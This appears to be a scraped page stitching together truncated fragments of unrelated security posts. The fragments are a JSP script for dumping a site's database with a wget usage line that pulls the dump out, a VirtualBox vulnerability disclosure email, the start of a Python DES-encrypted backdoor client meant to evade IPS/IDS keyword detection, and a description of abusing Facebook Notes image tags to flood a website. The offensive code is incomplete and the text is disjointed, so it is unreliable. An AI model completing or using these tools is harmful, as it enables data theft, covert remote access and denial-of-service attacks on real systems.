JSP wget database dump script, database dumping script

Gavin | 2014-05-20 17:27
A friend and I just took a look, and this can be implemented in JSP as well.
<%@ page contentType="text/html; charset=utf-8" %>
<%@ page language="java" %>
<%@ page import="java.sql.*" %>
<%
//author: By Gavin
//Usage: wget "http://xxx.com/wget_db.jsp?sn=0&en=5000000&ln=50000" -O gavin.sql
out.clear();
//number of rows returned by each segmented LIMIT query

Information on recently-fixed Oracle VM VirtualBox vulnerabilities

From: Matthew Daley <mattd () bugfuzz com>
Date: Fri, 07 Feb 2014 15:27:39 +1300
Hi there,
Recently I found a few vulnerabilities in Oracle VM VirtualBox, the open-source virtualization product. These have already been reported to the project, fixed and disclosed in the form of the recent January 2014 Oracle Critical Patch Update (at <http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html>). The purpose of this mail is simply to provide a few more specifics about each vulnerability to allow distributors, packagers and other users of the software to better classify them (and, of course, for the sake of freely sharing information!

Python encrypted-communication backdoor

Encrypting the communication content is still enough to get past some IPS and IDS products that detect by matching keywords in packets. A simple demo.
client.py
# client
import socket
import time
import binascii
import base64
import pyDes
import sys
#use des
iv = '2132435465768797'
key = 'aa000000000000000000000002200000000000aa0000000d'
#data = "afuckfucdfadf"
#des
def encrypt(iv,

Using Facebook Notes to DDoS any website

Facebook Notes allows users to include <img> tags. Whenever an <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once; however, by using random GET parameters the cache can be bypassed and the feature can be abused to cause a huge HTTP GET flood. Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014.